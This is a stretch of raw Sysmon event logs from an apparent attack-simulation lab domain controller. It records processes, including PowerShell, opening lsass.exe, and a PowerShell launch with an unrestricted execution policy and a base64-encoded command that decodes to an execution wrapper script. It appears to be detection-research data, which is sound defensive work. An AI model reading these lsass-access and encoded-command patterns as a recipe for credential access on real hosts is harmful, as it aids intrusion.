JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x8000000000000000241Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.649{10ACEC4A-83B6-5FCF-0B00-000000009001}8604064C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000240Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.649{10ACEC4A-83B6-5FCF-0B00-000000009001}8604064C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000239Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.634{10ACEC4A-83B6-5FCF-0B00-000000009001}8604064C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000238Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.587{10ACEC4A-83B6-5FCF-0B00-000000009001}8604064C:\Windows\system32\lsass.exe{10ACEC4A-8518-5FCF-CC02-000000009001}4904C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000237Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.587{10ACEC4A-83B6-5FCF-0B00-000000009001}8604064C:\Windows\system32\lsass.exe{10ACEC4A-8518-5FCF-CC02-000000009001}4904C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000236Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.556{10ACEC4A-8518-5FCF-CC02-000000009001}4904C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_3z5mtg0r.d5d.ps12020-12-08 13:52:24.556 10341000x8000000000000000235Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.540{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8518-5FCF-CC02-000000009001}4904C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000234Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.524{10ACEC4A-8518-5FCF-C902-000000009001}26962900C:\Windows\system32\conhost.exe{10ACEC4A-8518-5FCF-CC02-000000009001}4904C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000233Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.524{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000232Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.524{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000231Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.524{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000230Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.524{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000229Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.524{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000228Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.524{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000227Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.524{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000226Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.524{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000225Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.524{10ACEC4A-83AA-5FCF-0500-000000009001}640656C:\Windows\system32\csrss.exe{10ACEC4A-8518-5FCF-CC02-000000009001}4904C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000224Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.524{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.524{10ACEC4A-8518-5FCF-CB02-000000009001}11844876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8518-5FCF-CC02-000000009001}4904C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bd55255d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc9f3167(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc9f2e38(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bd4a471d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc9b39ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bca11e9d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc9f5502(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc9f5502(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc9f5393(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc9e7318(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc9f384b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc9f343e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc9f3167(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc9f2e38(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bd4a471d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc9d9c99(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc9d9269(wow64) 154100x8000000000000000222Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.526{10ACEC4A-8518-5FCF-CC02-000000009001}4904C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Admin